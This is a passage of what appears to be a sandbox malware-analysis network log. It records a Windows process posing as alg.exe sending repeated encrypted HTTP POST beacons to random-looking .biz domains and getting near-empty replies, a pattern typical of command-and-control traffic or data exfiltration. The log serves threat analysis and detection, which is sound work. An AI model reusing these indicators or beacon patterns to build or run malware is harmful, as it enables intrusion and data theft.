                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:58.763495922 CET778OUTData Raw: ed 50 52 f7 77 5b 75 0b fe 02 00 00 3e 34 be ca f3 26 4d 00 f1 66 a1 2c 51 26 11 42 11 08 2e a8 7b 00 ad 02 5c af c0 7c 08 c2 e0 aa 0b 84 75 43 cc 1f 6b c0 28 74 fe 15 53 b2 ae df 89 5c e7 5f e8 31 22 8e 0b f7 a9 70 ca dc ec 11 1a 72 20 22 23 72
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: PRw[u>4&Mf,Q&B.{\|uCk(tS\_1"pr "#rV8i(A@6PGP<-= 8DIa"hF@Exk,Z=j??3C~;9BJP)3|J6GS&o_@(P@dAr*/O%lu]4d
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:59.440339088 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=eb8bf04b0fd134c65ee37f591edb7bd1|155.94.241.187|1731920279|1731920279|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      57192.168.2.75003644.221.84.105805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:59.723517895 CET351OUTPOST /xjaepin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:59.723710060 CET778OUTData Raw: c4 03 53 69 89 b0 96 06 fe 02 00 00 69 98 88 13 af 3c 16 7b 00 ac bf cc 18 66 f6 53 0e a5 63 b3 4e b0 4c d1 7b aa 85 17 20 ec 6c 8e 8b 3e 1f cf 1d 88 3b 57 22 71 34 39 76 34 c9 90 8c b0 6c 39 2d 93 0d 3a f1 5d 22 e0 63 7e fe cb fc 86 f1 eb 4b b6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Sii<{fScNL{ l>;W"q49v4l9-:]"c~KQ0a8?-0LdXxrDBlaHeOUkk1o>:IBJUJuWYE1_9%G>IV)2bfb/WA47o<ql}|~zA}e|%&H6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.385080099 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=70467adf0ab0e60165e1306332edfc3d|155.94.241.187|1731920280|1731920280|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      58192.168.2.75003718.141.10.107805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.602369070 CET354OUTPOST /obyashlqvn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.602369070 CET778OUTData Raw: 06 40 21 c4 38 33 ee a8 fe 02 00 00 86 64 ca e5 b2 bc 96 75 68 1a 18 aa 0b ba 54 fd d2 13 46 c2 76 38 ca 4e c8 69 ab 5b bc 41 cb 63 aa a4 ff 39 85 c0 20 6f 08 1d 27 fb e8 3f c1 f2 4c 79 fa 97 56 a7 f8 e5 8c cd e5 71 5f d8 01 85 00 bc c1 6a ec aa
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: @!83duhTFv8Ni[Ac9 o'?LyVq_jSWNHG]|MZUiX2V7 *#u87_#>&x(eNn(w_.9a@oRz2qgD)U{c(>*T[&5ei[b8x{s[
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.070590019 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=00a26f23c8f0ae2fe55a3302646830ad|155.94.241.187|1731920281|1731920281|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      59192.168.2.75003818.246.231.120805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.376399994 CET349OUTPOST /pwpdijlf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.376444101 CET778OUTData Raw: 06 ab 4f dd 2e f9 51 4d fe 02 00 00 2a e6 07 35 2c 02 a9 b9 97 8c 18 2f 96 2e 64 4c 16 a1 b0 8e 07 77 6d c6 4e a7 cd bc b1 ed 20 41 62 10 20 82 da 54 55 f2 80 5a ad de 19 ef 49 9f a6 7a 45 b2 10 28 54 72 3d f0 e3 13 4c 64 7f 16 2f a6 6f 63 80 7a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: O.QM*5,/.dLwmN Ab TUZIzE(Tr=Ld/ocz;NVM,kf/YCmWM[b+A1"!9n[NU4K/I`FI9@b1}c` Z)uCF5Ce;*L(`h}yM~4QbR5DUaq
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.199114084 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=80659961ee274932f24a6d809bf30567|155.94.241.187|1731920283|1731920283|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      60192.168.2.75003918.208.156.248805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.442679882 CET360OUTPOST /msvrffxklscfuxyf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.442679882 CET778OUTData Raw: ad 5f 58 ee 9d 6a e3 8f fe 02 00 00 c4 90 ed 7d ab bf 4d d3 09 f2 e9 4e 4e 54 b4 85 5a 78 a6 8b 78 e2 97 34 74 f3 2f 61 ff 29 11 85 5a 90 a5 ac 02 c5 5f a4 ed 3e 2a 8c 45 44 68 fa c8 63 45 de 11 50 86 7d 23 4b 5c 03 fc 89 05 fe 10 9e 0a f7 a0 b5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: _Xj}MNNTZxx4t/a)Z_>*EDhcEP}#K\,_s&Cf04/*zFz^`6E5,-k'1v}nKE+g,Vsq6gi{v~f4JGnFRw.IV=_}op`Nap
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.096126080 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=523b9646738c5c7c2dba6f6b64e5ec41|155.94.241.187|1731920284|1731920284|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      61192.168.2.75004013.251.16.150805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.317079067 CET348OUTPOST /gvqfad HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.317114115 CET778OUTData Raw: 53 48 9e 6a 51 aa a5 0e fe 02 00 00 c0 c4 48 0a d0 dc bb d7 24 de ee 82 b4 b1 33 87 d8 45 cd 86 27 94 ee 70 ac 11 78 34 5d 64 9f 94 ed b5 51 9a c1 ac 47 17 c7 23 67 36 a4 0e 10 8a f8 d1 ab 78 d1 04 22 53 d0 0d 5e 34 44 80 2b 2a 86 98 7f 46 ed 82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: SHjQH$3E'px4]dQG#g6x"S^4D+*FVQc?Wj{NiLf&:i!Qjv~UPx0l'GZm;'!X}i-_.Q=zS &bVEs.}(F52z#B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.749259949 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=0d5ec55f2c2380cc58a07723bd77ec1f|155.94.241.187|1731920285|1731920285|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      62192.168.2.75004113.251.16.150805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.986740112 CET346OUTPOST /s HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.986783981 CET778OUTData Raw: f2 37 5a cd d1 d9 f8 a5 fe 02 00 00 7b c2 6f 86 d9 aa 4b e1 60 49 20 ca b8 a8 28 b5 80 cd 89 1a 58 77 02 89 93 9e cc 95 fe 56 73 c1 18 a6 a5 d7 b7 ea 4c 8b d8 40 89 9e 09 a8 4e 06 2d a8 c7 36 f7 ca 53 20 90 2f f0 25 ec b5 29 f7 6c d2 6f 8a 4e 26
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 7Z{oK`I (XwVsL@N-6S /%)loN&.9dF}5i~6_/mJE@FO*N*!!o*$P<y3K03vj[4qo)+$[`?U)[x^By>Dmznvn&V3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.438399076 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=fc2ea2439992e67424deb09958762d58|155.94.241.187|1731920287|1731920287|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      63192.168.2.75004247.129.31.21280
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.077781916 CET345OUTPOST /wj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.077796936 CET842OUTData Raw: 92 e0 b9 d1 cb 88 01 7b 3e 03 00 00 06 41 bb 52 59 8d 77 ff 6b 3c 40 ed c8 bf f6 7e 99 fd 04 d0 59 09 ba 2d 66 4b e9 d1 aa 64 69 fd 35 8b a5 fc e5 8a b9 78 de ba 8e 7f ca 00 ff 37 d5 46 43 84 7f 42 fd ad f3 83 ff cc bf 28 5e 72 40 69 2d 71 47 38
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: {>ARYwk<@~Y-fKdi5x7FCB(^r@i-qG8:HL`MO> =O=p|~j(_}`m2bK:Hsrd8\9ZgUQ<#uMYSs3qDmrRkO0aK;ljh7;'!;e%2Mq
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.567959070 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=90d5a64ba76e2f5f4137a2cf82288923|155.94.241.187|1731920288|1731920288|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      64192.168.2.75004334.211.97.45805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.716058016 CET355OUTPOST /njcuuhovhvf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.717648029 CET778OUTData Raw: 28 81 0d 11 b8 9e 90 3d fe 02 00 00 6d 1f 0e 65 58 60 92 ee d6 78 e5 72 4c ac db 88 23 66 db 26 0f 95 9e 58 50 18 ee 7e 1f 0e d7 f4 5a bd 10 d6 86 3e 94 5a 56 94 90 0c 2b 90 59 dd e6 92 05 cd a0 a1 b5 7f 87 01 8e 75 b9 d7 fa 32 f8 3a a2 91 a6 4e
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: (=meX`xrL#f&XP~Z>ZV+Yu2:Nz7RIwkTM\[n|('d_;&H5+0n6\Ct\V'\d+`bg[2utj^"6;\A_PM#\hj$ASh
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.553889036 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=791586a4f113248cc519c1ba8b55367e|155.94.241.187|1731920288|1731920288|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      65192.168.2.75004413.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.586793900 CET347OUTPOST /llwod HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.586807013 CET842OUTData Raw: b4 d1 9b cc c1 b7 05 7a 3e 03 00 00 4c bd d3 f2 72 04 47 fe 91 67 1f c5 74 db b5 4c 40 15 fb 51 2f ba 35 8a f5 93 86 b0 fa 62 67 d5 20 ad 70 2d 05 36 40 01 b4 af 34 e3 f6 78 5c 03 92 92 da dd c7 65 ac cc 78 8c b4 76 ec 78 a0 0d 3d 21 a4 2d e0 24
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: z>LrGgtL@Q/5bg p-6@4x\exvx=!-$iL6IN1OJ8u 9J55(#iTUnhp";_7gP*3?mw]0p1ye![0ty[v2MX#JU=\Qk3>sx1lg9y{
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.031752110 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
